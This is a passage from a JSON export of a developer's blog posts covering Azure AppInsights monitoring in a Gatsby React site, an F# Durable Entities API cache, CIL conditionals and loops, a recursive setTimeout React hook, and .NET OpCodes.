AppInsights into our application, and we’ll start by creating a service that will setup the instrumentation for us:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 // AppInsights.js import { ApplicationInsights } from '@microsoft/applicationinsights-web' import { ReactPlugin, withAITracking } from '@microsoft/applicationinsights-react-js' import { globalHistory } from "@reach/router" const reactPlugin = new ReactPlugin(); const ai = new ApplicationInsights({ config: { instrumentationKey: process.env.APPINSIGHTS_KEY, extensions: [reactPlugin], extensionConfig: { [reactPlugin.identifier]: { history: globalHistory } } } }) ai.loadAppInsights() export default (Component) => withAITracking(reactPlugin, Component) export const appInsights = ai.appInsights This file is responsible for two things, the first is to set up the AppInsights connection using the key provided (we’re using an environment variable to store this which allows us to use a different one on each environment) and the second job is to export a Higher Order Component (HOC) that provides our AppInsights instance to the HOC provided by the React extension (this is just a convenience approach, you don’t need to wrap the HOC if you’d prefer not to add additional components).\nThe main difference here from the documentation of the React extension is providing the history information. Gatsby uses @reach/router not react-router, so we don’t create the history object, we use the one that the router defines for us (exposed as globalHistory from the @reach/router package).\nTracking Pages With AppInsights now available in our application let’s start by enabling it on all pages so that we can track page visits and any unhandled errors. The best place for us to do this is on the top-most component that we have access to, normally this would be you’re <App /> component that goes into the DOM. With Gatsby we don’t have access to that component, instead would use the files in the pages directory, but with this template we’re modifying the components/Layout rather than any of the pages since <Layout /> is the topmost component used on every page.\nWe’ll wrap the component with our HOC like so:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 import React from 'react' import Headroom from 'react-headroom' import { Container } from 'semantic-ui-react' import Footer from '../Footer' import Header from '../Header' import withAppInsights from '../../AppInsights'; import 'semantic-ui-css/semantic.min.css' const Layout = ({ location, children }) => ( <> <Headroom upTolerance={10} downTolerance={10} style={{ zIndex: '20', height: '6.5em' }} > <Header location={location} /> </Headroom> <Container text>{children}</Container> <Footer /> </> ) export default withAppInsights(Layout) If you start navigating around and look into your developer tools Network tab you’ll see requests being made to AppInsights!\nIn the above screenshot I have a few objects in the output payload (AppInsights batches requests to upload metrics ever 15000ms which is configurable), one of which is the metrics information for the previous page we were on (how long the component was mounted for) with the other being the navigation event.\nIt’s worth noting that you don’t have to wrap the whole page, you can just wrap the specific components that you want to track instead. The HOC provided by the React extension will wrap your component in a <div> and attach event handles to user interaction events (such as click, mouse movement and touch) so that it can track the event of “when the component was interacted with”. When the HOC is unmounted it will send metrics to AppInsights about how long the component was interacted with. Here we’re combining Page View and Component Interaction into a single example.\nNow we’re starting to track how long a user spends on a page and what pages they have visited, let’s have a look at some specialised monitoring.\nMonitoring Specific User Interactions Let’s say you’re trying to understand user behaviour on the site and you want to know about specific actions, such clicking the “Add to Cart” button. To do this we can use the trackEvent custom metric tracking:\n1 2 3 4 const handleSubmit = async () => { appInsights.trackEvent({ name: 'Add To Cart', properties: { productId } }) // snip } Here we’re using the appInsights object that we are exporting from where we set up the AppInsights instance and passing through some data to trackEvent, the name of the event we’re tracking (which we can filter on in the Azure Portal) and then any custom properties we want to include in the event. Here we’re passing through the productId, so you could determine how frequently a specific product is added to carts, but you could add any information that would be useful to understand and provide context to the event.\nMonitoring Failures Applications do have bugs, it’s a fact of life, but we want to know when those failures happen. When these happen in JavaScript it’s often not captured, they may be completely silent to the user and result in interactions failing until they reload the page. The AppInsights JavaScript SDK captures unhandled exceptions that trigger window.onerror (and if this PR is merged unhandled promise rejections), but what about errors that we can handle? maybe a network request failed and we showed the user a message, we might want to try and track that event so we can correlate client and server metrics.\nTo do this we can use the trackException method:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 const handleSubmit = async () => { appInsights.trackEvent({ name: 'Add To Cart', properties: { productId } }) const cartId = await localStorage.getItem('mcart') const error = validate(quantity) setError(error) if (!error) { setLoading(true) Moltin.addToCart(cartId, productId, quantity) .then(() => { addToCart(quantity, cartId) setLoading(false) setQuantity(quantity) setVisible(true) toggleMessage() }) .catch(err => { setError(`Error: ${err.errors[0].detail}` || 'Something went wrong') setLoading(false) appInsights.trackException({ error: new Error(err), severityLevel: SeverityLevel.Error }) }) } } Here at the end of the Promise catch we’re calling trackException and passing in an object that contains the error information and a severityLevel for the event of Error. The severityLevel is important to control here as that can be used by Azure to trigger alerting rules defined in AppInsights and if it’s an error that’s originated server-side maybe you don’t want to double-trigger an alert.\nViewing Metrics in Azure Now that we’re starting to generate metrics as we navigate around the site, let’s head over to the Azure Portal, navigate to our AppInsights resource and select Log (Analytics) under the Monitoring section.\nThis is a place where you can create queries against the AppInsights data that is being captured from your application and it has a reasonably easy to pick up query language. We’ll start with a simple query to show some page views:\npageViews | limit 50 This opens the pageViews table and we use the pipe (|) character to denote commands, in this case, the command we’re executing limit command with a value of 50, which limits the number of results returned in the query to 50.\nThe screenshot shows the returned results, in which we see a bunch of pages which I navigated around.\nLet’s look at our custom event, tracking the clicks on the Add to Cart button:\ncustomEvents | where name == "Add To Cart" | limit 50 For this query we open the customEvents table, since it wasn’t a predefined metric type and add a where filter against the name to limit it to Add To Cart.\nThere we can see three Add To Cart operations, and which products were added to the cart. With the query you could expand the condition clauses to look for specific products or any other information you’ve captured on the event.\nConclusion This post has given us an introduction to Azure AppInsights, and in particular the React extension. We’ve seen how to integrate page view tracking as well as tracking custom metrics against specific interactions and finally error tracking, before looking at how we can start viewing that data in the Azure Portal.\n", "id": "2019-10-04-implementing-monitoring-in-react-using-appinsights" }, { "title": "Using Durable Entities and Orchestrators to Create an Api Cache", "url": "https://www.aaron-powell.com/posts/2019-09-27-using-durable-entities-and-orchestrators-to-create-an-api-cache/", "date": "Fri, 27 Sep 2019 09:01:28 +1000", "tags": [ "serverless", "fsharp", "azure-functions" ], "description": "Let's look at how you can use Entities in Durable Functions v2 to create an API cache", "content": "This post is part of #ServerlessSeptember, a month-long series we’ve been producing as part of the Cloud Advocate team.\nI’ve been playing a bunch with Durable Entities and I must say, I really love the experience of building with the framework, but what I find really cool is how it can integrate seamlessly with Orchestrators from Durable Functions v1.\nFor a demo I’ve been working on I need to pull data from an external API, but this API a) has a rate limit on it and b) can vary in the response time. Because of this I wanted to work out how I could cache the response from it for a period of time.\nIn a traditional API I would be doing this by writing to a data store (maybe Redis) and then keeping track of a timestamp when I wrote the data, and if it’s stale I’d re-fetch the data and update it. But with Durable Entities we can persist some state without a whole lot of effort!\nCreating Our Entity Let’s create a generic base for our cache and implement it (we’ll just cache string array in our API, but you could use anything here):\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 type ICache<'T> = abstract member Init: 'T -> unit abstract member Clear: unit -> unit [<AbstractClass>] type Cache<'T>() = [<JsonProperty>] member val Items = Unchecked.defaultof<'T> with get, set member this.Init i = this.Items <- i member __.Clear() = Entity.Current.DestructOnExit() interface ICache<'T> with member this.Init i = this.Init i member this.Clear() = this.Clear() type StringArrayCache() = inherit Cache<string array>() [<FunctionName("StringArrayCache")>] static member Run ([<EntityTrigger>] ctx: IDurableEntityContext) = ctx.DispatchAsync<StringArrayCache>() Quick note, in F# you need to create a member of the class and the interface due to this bug, that’s why I have an Init method on the interface which just calls the Init method on the class.\nOur StringArrayCache Entity will be initialised with a value and we intend to store that value until the cache expires.\nCreating a HTTP Function With our Entity defined it’s time to create the Function that we’re calling that caches data:\n1 2 3 4 5 6 7 [<FunctionName("HttpCachingFunction")>] let run ([<HttpTrigger(AuthorizationLevel.Function, "get", Route = "data")>] req : HttpRequest) ([<DurableClient>] client: IDurableClient) = task { // todo } This is a standard HTTP triggered function and will be responsible for populating our cache. This might not be the most optimal way to do it in your project, maybe you want a timer trigger that runs on start up and then ever n number of minutes, but I just want to keep it simple. The second argument is a DurableClient binding which will be what we use to work with the Entity and Orchestrator.\nNote: In v1 this binding was called OrchestrationClient, but was renamed to DurableClient for v2.\n1 2 3 4 5 6 7 8 9 [<FunctionName("HttpCachingFunction")>] let run ([<HttpTrigger(AuthorizationLevel.Function, "get", Route = "data")>] req : HttpRequest) ([<DurableClient>] client: IDurableClient) = task { let entityId = EntityId(typeof<StringArrayCache>.Name, "Cache") return OkResult() } We’re starting to scaffold out our Function, the first thing we’re going to need is a Cache Identifier, which is in the form of the EntityId. I’ve got this hard coded to be the name of our cache class (if I was using F# 4.7 with preview features I could use nameof like in C#) and the key Cache. If you were doing cache-by-user then maybe you’d use the user ID as the cache key.\nNote: The Entity Name, which I defined as typeof<StringArrayCache>.Name, must match the value provided to the FunctionName attribute on the Entity, again where nameof can be useful.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 [<FunctionName("HttpCachingFunction")>] let run ([<HttpTrigger(AuthorizationLevel.Function, "get", Route = "data")>] req : HttpRequest) ([<DurableClient>] client: IDurableClient) = task { let entityId = EntityId(typeof<StringArrayCache>.Name, "Cache") let! state = client.ReadEntityStateAsync<StringArrayCache> entityId if state.EntityExists then return OkObjectResult state.EntityState.Items else // Todo return OkResult() } With the Cache Identifier defined it’s time to look up whether it does already exist in the cache, and we do that by reading the Entity State from the IDurableClient input. This returns us an object with an EntityExists boolean property and if it does exist we can access that Entity via EntityState, so we’re returning the Items property if it does exist, which is where our cached data lives.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 [<FunctionName("HttpCachingFunction")>] let run ([<HttpTrigger(AuthorizationLevel.Function, "get", Route = "data")>] req : HttpRequest) ([<DurableClient>] client: IDurableClient) = task { let entityId = EntityId(typeof<StringArrayCache>.Name, "Cache") let! state = client.ReadEntityStateAsync<StringArrayCache> entityId if state.EntityExists then return OkObjectResult state.EntityState.Items else do! Task.Delay 5000 let cachedData = [|"a";"b";"c"|] do! client.SignalEntityAsync<ICache<string array>>( entityId, fun (proxy: ICache<string array>) -> proxy.Init cachedData ) return OkObjectResult cachedData } If the Entity doesn’t exist then we need to fetch the data from our external source (I’m simulating this with a Task.Delay) and once we have the data we can initalise our Entity with client.SignalEntityAsync. I’m doing this using the Typed Client approach, where you need to provide the interface that your Entity implements. Since I’m using a generic base class I provide it with ICache<string array>, next we provide it with the EntityId we created above and the signaling method. This method is provided with a proxy instance of your Entity (cast as the interface) and allows you to do whatever you want before calling a specific method on the Entity itself. I’ve kept it simple and just called the Init method providing our data to cache.\nFinally, we return the data from this brach so that the responses are the same, regardless of whether it was cached or not.\nInteresting side note, the proxy is a dynamically generated class, not your actual implementation (my StringArrayCache). Instead it does some “magic” which results in calling your EntityTrigger function. The way this works is quite interesting and I’ll explore it in my IL blog series.\nWe’re done now, our data will be cached forever with that entity.\nCreating a Cache Timeout While an infinite cache might be good, we probably want the data to expire at some point in time and either automatically replaced or only replaced when it’s next required. To achieve this we’ll use a Durable Orchestrator which was introduced in the Durable Functions v1 release.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 [<FunctionName("CacheOrchestrator")>] let cacheOrchestrator ([<OrchestrationTrigger>] ctx: IDurableOrchestrationContext) (logger: ILogger) = task { logger.LogInformation "Starting Cache manager" let entityId = ctx.GetInput<EntityId>() let timer = ctx.CreateTimer(ctx.CurrentUtcDateTime.AddMinutes(1.), CancellationToken.None) do! timer logger.LogInformation "Cache cleaning" ctx.SignalEntity(entityId, "Clear") } The Orchestrator is pretty simple if you’ve been working with Durable Functions v1. We start off with a trigger type of OrchestrationTrigger and the type we expect is an IDurableOrchestrationContext.\nNote: This is a type change from Durable Functions v1. In v1 it was a class named DurableOrchestrationContext, now we have an interface which is prefixed with I as per the .NET style guide.\nSince this Orchestrator is to be generic we’re expecting the EntityId to be passed in as input, so it could be responsible for the timeout handling of multiple caches.\nNow we can create a Timer for our cache expiry using the context’s CreateTimer function. As per the guidance in the documentation we’re using the CurrentUtcDateTime from the context and then adding 1 minute to it, this is when our cache will expire. (I’d consider passing in the timeout duration, rather than hard-coding it like I have, but I kept it simple for this demo.)\nWe then wait for the timer to elapse (do! timer) and once it’s done we need to tell the cache Entity to destroy itself, and this is where the Clear method on our Entity comes in. It’s also worth noting that this time when we signal the Entity it’s using a synchronous method called SignalEntity and it requires you to pass in the name of the method you want to call (this is similar to untyped signaling).\nThe Clear method looks like this:\n1 2 member __.Clear() = Entity.Current.DestructOnExit() And it called the DestructOnExit method of the current Entity, which isn’t actually a function of the class itself, but it tells the Durable Entity framework that this Entity has completed and can be deleted. This is similar to when an Orchestrator function finishes and the RuntimeStatus is Completed.\nConclusion This brings us to the end of todays post, we’ve seen how we can combine Entities and Orchestrators in a single set of functions. We used this to create a cache of responses for HTTP calls, but we could use this on any data access happening within our Serverless application.\nMake sure you check out the rest of #ServerlessSeptember for more Serverless content!\nBonus Tip It’s likely that when we get an RTM of Durable Entities we won’t need to use the Orchestrator for the timer as they are getting that support.\n", "id": "2019-09-27-using-durable-entities-and-orchestrators-to-create-an-api-cache" }, { "title": "Adventures in IL: Conditionals and Loops", "url": "https://www.aaron-powell.com/posts/2019-09-24-adventures-in-cil-conditionals-and-loops/", "date": "Tue, 24 Sep 2019 09:33:46 +1000", "tags": [ "dotnet", "csharp", "fsharp" ], "description": "It's time to take another look at CIL, how do conditionals and loops work?", "content": "Last time we explored IL (well, CIL, but most people know it as just IL) we were introduced to OpCodes and their meaning by going through a really simple method. Today, I want to look at two common statements we use in programming, conditional statements (if and switch) and loops (for, foreach, etc.). We’ll also look at something that we skipped from the last post, the difference between Debug and Release builds (well, building with or without compiler optimisations).\nIf Statements Let’s take the following F# function:\n1 2 3 4 5 let ifStatement a = if a = 1 then Console.WriteLine "one" else Console.WriteLine "not one" I’m using Console.WriteLine rather than the F# Core.Printf module and printfn as it makes less verbose code. Normally in F# I’d use printfn though.\nThis will generate the following IL:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 IL_0000: ldarg.0 IL_0001: ldc.i4.1 IL_0002: bne.un.s IL_0006 IL_0004: br.s IL_0008 IL_0006: br.s IL_0013 IL_0008: ldstr "one" IL_000d: call void [mscorlib]System.Console::WriteLine(string) IL_0012: ret IL_0013: ldstr "not one" IL_0018: call void [mscorlib]System.Console::WriteLine(string) IL_001d: ret There are a few OpCodes which are familiar but we’re also meeting a some new ones. The first two in our output are responsible for loading the value of the argument (a in our code) onto the stack and then pushing the int32 value 1 onto the stack. Now we’re getting to a new OpCode and we’re also going to need to understand a bit more about the piece that is to the left of the : (that we ignored last time), which is called the instruction prefix.\nAn instruction in IL can be made up of two pieces of information in the format of prefix: instruction. Let’s take the following line:\n1 IL_0002: bne.un.s IL_0006 Here we have a prefix of IL_0002 and the instruction for that line is bne.un.s IL_0006 which is define here. To quote the documentation for the instruction for bne.un.s:\nTransfers control to a target instruction (short form) when two unsigned integer values or unordered float values are not equal.\nThat’s interesting, it’s a not equal operation whereas our code was if a = 1 then, so the IL represents the inverse of what our code represented. To understand why we need to look at the rest of the instruction, and the rest of the IL, since there’s another bit of information passed to bne.un.s, IL_0006, which represents the target instruction to transfer control to. Effectively what this says is “if the two values don’t match the next line to execute is IL_0006”.\nHere’s where that sits in the IL:\n1 2 3 IL_0004: br.s IL_0008 IL_0006: br.s IL_0013 You’ll notice that IL_0006 is after IL_0004, so we’re skipping IL_0004, essentially using a goto statement!\nJust an aside, F# doesn’t have a goto statement, C# does!\nBoth IL_0004 and IL_0006 use br.s which again transfers control to another instruction:\n1 2 3 4 5 6 7 IL_0008: ldstr "one" IL_000d: call void [mscorlib]System.Console::WriteLine(string) IL_0012: ret IL_0013: ldstr "not one" IL_0018: call void [mscorlib]System.Console::WriteLine(string) IL_001d: ret Both of these blocks are pretty similar, IL_0008 is the start of the truthy branch of our if statement, loading a string onto the stack then calling Console.WriteLine before issuing a ret to end the method. IL_0013 is the falsey branch and using the control transfer we skip over the truthy block.\nSo if we break it down, an if statement is a series of GOTO calls to jump over blocks we don’t want to execute.\nIf Statements in C# Out of curiosity, I decided to create the same example in C#:\n1 2 3 4 5 6 7 8 9 10 11 public void IfStatements(int a) { if (a == 1) { Console.WriteLine("One"); } else { Console.WriteLine("Not One"); } } And what I found is that it generates different IL!\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 IL_0000: nop IL_0001: ldarg.1 IL_0002: ldc.i4.1 IL_0003: ceq IL_0005: stloc.0 IL_0006: ldloc.0 IL_0007: brfalse.s IL_0018 IL_0009: nop IL_000a: ldstr "One" IL_000f: call void [mscorlib]System.Console::WriteLine(string) IL_0014: nop IL_0015: nop IL_0016: br.s IL_0025 IL_0018: nop IL_0019: ldstr "Not One" IL_001e: call void [mscorlib]System.Console::WriteLine(string) IL_0023: nop IL_0024: nop IL_0025: ret What’s interesting here is that in the C# version it uses ceq and combines it with brfalse.s. ceq does an equality test on two values and if they are equal it pushes 1 onto the stack, otherwise 0, and then brfalse.s transfers control to an instruction, IL_0018 in our case, if the value on the stack is false, null or 0.\nYou’ll also notice the use of br.s when the truthy block finishes skipping over the falsey block and land on ret, whereas F# just inlined the ret.\nThis makes the C# version a little more verbose than the F# version when achieving the same thing.\nDebug vs Release Both of the above examples are compiled using “Debug mode”, so there are no compiler optimisations enabled. But that’s not what you’re going to deploy to production (right? RIGHT!) so again I was interested to see the differences there. Here’s the F# one compiled with optimisations:\n1 2 3 4 5 6 7 8 9 10 11 IL_0000: ldarg.0 IL_0001: ldc.i4.1 IL_0002: bne.un.s IL_000f IL_0004: ldstr "one" IL_0009: call void [mscorlib]System.Console::WriteLine(string) IL_000e: ret IL_000f: ldstr "not one" IL_0014: call void [mscorlib]System.Console::WriteLine(string) IL_0019: ret And here’s C#:\n1 2 3 4 5 6 7 8 9 10 11 IL_0000: ldarg.1 IL_0001: ldc.i4.1 IL_0002: bne.un.s IL_000f IL_0004: ldstr "One" IL_0009: call void [mscorlib]System.Console::WriteLine(string) IL_000e: ret IL_000f: ldstr "Not One" IL_0014: call void [mscorlib]System.Console::WriteLine(string) IL_0019: ret Well, they look very similar don’t they, in fact, they are identical (I had to check a few times that yes, I was copying different ones!). They both resemble the unoptimised F# output, but with the minor difference of a few less br.s instructions around the place.\nFor Loops When it comes to loops I tend to use the for loop most commonly, so we’ll use that for our exploration today. Starting with a simple F# function:\n1 2 3 let forLoop() = for i in 0 .. 99 do Console.WriteLine i Which results in the following IL:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 IL_0000: ldc.i4.0 IL_0001: stloc.0 IL_0002: br.s IL_000e // loop start (head: IL_000e) IL_0004: ldloc.0 IL_0005: call void [mscorlib]System.Console::WriteLine(int32) IL_000a: ldloc.0 IL_000b: ldc.i4.1 IL_000c: add IL_000d: stloc.0 IL_000e: ldloc.0 IL_000f: ldc.i4.1 IL_0010: ldc.i4.s 99 IL_0012: add IL_0013: blt.s IL_0004 // end loop IL_0015: ret I’ve left some indentations and comments that IL Spy generated for me to help visualise the IL a bit better.\nWe start by pushing the initial value of i onto the stack with ldc.i4.0 and then ensure the stack is at the right location with stloc.0 before using br.s to move down to IL_000e. This is the start of our equality test to ensure that we’re still in the loop range:\n1 2 3 4 5 IL_000e: ldloc.0 IL_000f: ldc.i4.1 IL_0010: ldc.i4.s 99 IL_0012: add IL_0013: blt.s IL_0004 Location 0 is loaded on the stack (which is our i value) then the values of 1 and 99 are pushed onto the stack with ldc.i4.1 and ldc.i4.s respectively (ldc.i4.1 is shorthand for ldc.i4.s 1, and likely optimised by your runtime) before add is called which pushes the value of 100 onto the stack. Finally blt.s is called and if the value in stack position 0 is less than the result of add we’ll transfer control higher up in the instruction list, specifically to IL_0004. Now we’ve ended up with this block:\n1 2 3 4 5 6 IL_0004: ldloc.0 IL_0005: call void [mscorlib]System.Console::WriteLine(int32) IL_000a: ldloc.0 IL_000b: ldc.i4.1 IL_000c: add IL_000d: stloc.0 We grab the value from stack position 0, hand it to Console.WriteLine, get it again, add 1 to it and fall through to IL_000e since there’s no control transfer.\nI find this order quite interesting, the output IL is in reverse order to what I expected it to be, the conditional test is at the end of the instruction list, but upon dissection it makes a lot of sense. If the conditional test was at the top you’d always have to use a br.s to transfer control back up to the top when the loop body finishes and then have a control transfer test (a brtrue.s) if the range was exceeded. This would be inefficient as you’d always execute a control transfer and then have a second potental control transfer, whereas having it in reverse you only have 1 control transfer and it’s conditional.\nFor Loops in C# Again we’ll look at a C# implementation:\n1 2 3 4 5 6 7 public void ForLoop() { for (var i = 0; i < 100; i++) { Console.WriteLine(i); } } Resulting in the following IL:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 IL_0000: nop IL_0001: ldc.i4.0 IL_0002: stloc.0 IL_0003: br.s IL_0012 // loop start (head: IL_0012) IL_0005: nop IL_0006: ldloc.0 IL_0007: call void [mscorlib]System.Console::WriteLine(int32) IL_000c: nop IL_000d: nop IL_000e: ldloc.0 IL_000f: ldc.i4.1 IL_0010: add IL_0011: stloc.0 IL_0012: ldloc.0 IL_0013: ldc.i4.s 100 IL_0015: clt IL_0017: stloc.1 IL_0018: ldloc.1 IL_0019: brtrue.s IL_0005 // end loop IL_001b: ret It’s pretty similar to the F# version (ignoring the nop instructions) except how the equality test is done. In our F# version, like with the if statement, the equality test was combined with the control transfer using blt.s whereas C# uses clt and brtrue.s to compare the values and then transfer control.\nThe other major difference is that the C# version loads 100 onto the stack for the clt test but F# pushes 1 and 99, then adds them together, meaning it’s equality test is more akin to i < 1 + 99 rather than C#’s i < 100.\nDebug vs Release It’s time to compare what happens when we enable compiler optimisations, starting with F#:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 IL_0000: ldc.i4.0 IL_0001: stloc.0 IL_0002: br.s IL_000e // loop start (head: IL_000e) IL_0004: ldloc.0 IL_0005: call void [mscorlib]System.Console::WriteLine(int32) IL_000a: ldloc.0 IL_000b: ldc.i4.1 IL_000c: add IL_000d: stloc.0 IL_000e: ldloc.0 IL_000f: ldc.i4.s 100 IL_0011: blt.s IL_0004 // end loop IL_0013: ret And now C#:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 IL_0000: ldc.i4.0 IL_0001: stloc.0 IL_0002: br.s IL_000e // loop start (head: IL_000e) IL_0004: ldloc.0 IL_0005: call void [mscorlib]System.Console::WriteLine(int32) IL_000a: ldloc.0 IL_000b: ldc.i4.1 IL_000c: add IL_000d: stloc.0 IL_000e: ldloc.0 IL_000f: ldc.i4.s 100 IL_0011: blt.s IL_0004 // end loop IL_0013: ret This time we’ve got identical IL (F# even uses 100 rather than doing an addition!), good to know, but also interesting to see just how different the output can be when you enable compiler optimisations.\nConclusion Now we’ve seen some of the nity gritty parts of IL and that everything is just a GOTO statement at the end of the day! 🤣\nUnderstanding how control is transfered around within our IL helps us understand how the compiler makes optimisations and why we should write code in a particular way.\nI’ll leave you with the output of a switch statement, see if you can work out the C# that it was generated from:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 IL_0000: ldarg.1 IL_0001: ldc.i4.1 IL_0002: beq.s IL_000a IL_0004: ldarg.1 IL_0005: ldc.i4.2 IL_0006: beq.s IL_0015 IL_0008: br.s IL_0021 IL_000a: ldstr "One" IL_000f: call void [mscorlib]System.Console::WriteLine(string) IL_0014: ret IL_0015: ldstr "Two" IL_001a: call void [mscorlib]System.Console::WriteLine(string) IL_001f: br.s IL_000a IL_0021: ldstr "Default" IL_0026: call void [mscorlib]System.Console::WriteLine(string) IL_002b: ret Good luck!\n", "id": "2019-09-24-adventures-in-cil-conditionals-and-loops" }, { "title": "Recursive setTimeout with React Hooks", "url": "https://www.aaron-powell.com/posts/2019-09-23-recursive-settimeout-with-react-hooks/", "date": "Mon, 23 Sep 2019 11:44:09 +1000", "tags": [ "react", "javascript", "typescript" ], "description": "How to use React Hooks to create a polling API using setTimeout", "content": "I’m working on a project at the moment where I need to be able to poll an API periodically and I’m building the application using React. I hadn’t had a chance to play with React Hooks yet so I took this as an opportunity to learn a bit about them and see how to solve something that I would normally have done with class-based components and state, but do it with Hooks.\nWhen I was getting started I kept hitting problems as either the Hook wasn’t updating state, or it was being overly aggressive in setting up timers, to the point where I’d have dozens running at the same time.\nAfter doing some research I came across a post by Dan Abramov on how to implement a Hook to work with setInterval. Dan does a great job of explaining the approach that needs to be taken and the reasons for particular approaches, so go ahead and read it before continuing on in my post as I won’t do it justice.\nInitially, I started using this Hook from Dan as it did what I needed to do, unfortunately, I found that the API I was hitting had an inconsistence in response time, which resulted in an explosion of concurrent requests, and I was thrashing the server, not a good idea! But this was to be expected using setInterval, it doesn’t wait until the last response is completed before starting another interval timer. Instead I should be using setTimeout in a recursive way, like so:\n1 2 3 4 5 const callback = () => { console.log("I was called!"); setTimeout(callback, 1000); }; callback(); In this example the console is written to approximately once every second, but if for some reason it took longer than basically instantly to write to the console (say, you had a breakpoint) a new timer isn’t started, meaning there’ll only ever be one pending invocation.\nThis is a much better way to do polling than using setInterval.\nImplementing Recursive setTimeout with React Hooks With React I’ve created a custom hook like Dan’s useInterval:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 import React, { useEffect, useRef } from "react"; function useRecursiveTimeout<T>( callback: () => Promise<T> | (() => void), delay: number | null ) { const savedCallback = useRef(callback); // Remember the latest callback. useEffect(() => { savedCallback.current = callback; }, [callback]); // Set up the timeout loop. useEffect(() => { let id: NodeJS.Timeout; function tick() { const ret = savedCallback.current(); if (ret instanceof Promise) { ret.then(() => { if (delay !== null) { id = setTimeout(tick, delay); } }); } else { if (delay !== null) { id = setTimeout(tick, delay); } } } if (delay !== null) { id = setTimeout(tick, delay); return () => id && clearTimeout(id); } }, [delay]); } export default useRecursiveTimeout; The way this works is that the tick function will invoke the callback provided (which is the function to recursively call) and then schedule it with setTimeout. Once the callback completes the return value is checked to see if it is a Promise, and if it is, wait for the Promise to complete before scheduling the next iteration, otherwise it’ll schedule it. This means that it can be used in both a synchronous and asynchronous manner:\n1 2 3 4 5 6 7 8 useRecursiveTimeout(() => { console.log("I was called recusively, and synchronously"); }, 1000); useRecursiveTimeout(async () => { await fetch("https://httpstat.us/200"); console.log("Fetch called!"); }, 1000); Here’s a demo:\nConclusion Hooks are pretty cool but it can be a bit trickier to integrate them with some APIs in JavaScript, such as working with timers. Hopefully this example with setTimeout is useful for you, feel free to copy the code or put it on npm yourself.\n", "id": "2019-09-23-recursive-settimeout-with-react-hooks" }, { "title": "What is an OpCode?", "url": "https://www.aaron-powell.com/posts/2019-09-17-what-is-an-opcode/", "date": "Tue, 17 Sep 2019 09:17:10 +1000", "tags": [ "dotnet" ], "description": "IL is full of these things call OpCodes, but what are they?", "content": "In my last post we say the differences between interface implementations in the IL that is generated, but as a refresher, it looks like this:\n.method private final hidebysig newslot virtual instance void UserQuery.ICounter.Add ( int32 count ) cil managed { .override method instance void UserQuery/ICounter::Add(int32) .maxstack 8 IL_0000: ldarg.0 IL_0001: ldarg.0 IL_0002: call instance int32 UserQuery/Counter::get_Count() IL_0007: ldarg.1 IL_0008: add IL_0009: call instance void UserQuery/Counter::set_Count(int32) IL_000e: nop IL_000f: ret And the code that created it looked like this:\n1 2 3 4 5 6 7 8 9 interface ICounter { void Add(int count); } class Counter : ICounter { public int Count { get; set } public void Add(int count) => Count += count; } Today, I want to talk about what the heck that all means, specifically, what makes up the method body, and to do that I want to introduce you to the System.Reflection.Emit namespace and specifically the OpCodes class.\nBefore We Dive In There’s a bit of important background information to understand before we dive too deep into what we’re going to look at today, and that’s how .NET works. .NET languages like C#, F# and VB.NET (as well as others) all output the Common Intermediate Language (CIL) (sometimes referred to as Microsoft Intermediate Language/MSIL) that is then executed by a runtime such as the Common Language Runtime (CLR) using a Just-In-Time (JIT) compiler to create the native code that is executed.\nSo, regardless of whether you’re writing C# or F# it’s all the same at the end of the day and you can convert F# code to C# by reversing the CIL, but it’s probably going to be rather funky. This is how tools like ilspy work.\nThe CIL is defined as part of the Common Language Infrastructure (CLI) which is standardised as ECMA-335 with the primary implementation being the one Microsoft has done for .NET, but there’s nothing stopping someone else making their own implementation (except time…). Before anyone asks, no, I haven’t read ECMA-335. I did use to have it on my kindle but I never did read it. ECMA-262 on the other hand… 😉\nCIL is a stack-based bytecode, making it quite low-level and reminds me a lot of the x86 assembly programming I did at university, so if that’s your jam, then we’re in for some fun! If you’ve never had the, err, pleasure of working with assembly, or stack-based machines, the most important thing to know is that you push things onto a stack so that you can read them off again, and you have to read things off in the reverse order that you pushed them on, last-on-last-off style.\nNow, onto the fun part!\nOpCodes An OpCode represents an operation in CIL that can be executed by the CLR. These are mostly about working with the stack, but thankfully it’s not all PUSH and POP, we get some higher-level operations to work with, and even basic indexers that we can leverage too (so it’s not quite as sequential as 8086 that I learnt).\nOur First OpCode Let’s start with this line:\nIL_0000: ldarg.0 First things first, we can remove the stuff before the :, as that is representing the label of the line, which we could use as a jump point, but we don’t need the labels at the moment so we’ll focus on the instruction:\nldarg.0 In .NET this is represented as OpCodes.Ldarg_0 and its role is to push the first argument (of the current method) onto the stack. There’s also ldarg.1, ldarg.2 and ldarg.3 to access the first 4 arguments to a method, with ldarg.s <int> being used to access all the rest. In the future, we’ll see how to use ldarg.s, it’s not for today.\nSo if we’re calling our code like this:\n1 counter.Add(1); Inside the Add CIL we’re pushing 1 into the first position on the stack.\nCalling Functions in CIL The next important piece of CIL to look at is this:\ncall instance int32 UserQuery/Counter::get_Count() This is a method call using the Call OpCode. To use this OpCode we need to provide some more information, the location of the method we’re calling, the return type and finally the method reference.\nBut wait, what method are we calling? We’re calling Counter.get_Count(), but we never wrote that in our C# code, it was generated for us as the property accessor. This method just wraps the backing field (which was also generated for us as we used an auto-property).\nSince the method is part of the type we’re also part of we use the instance location and it’ll return an int32. And since this is a non-void method call we need to push the return value onto the stack, which is done using ldarg.1, or in .NET 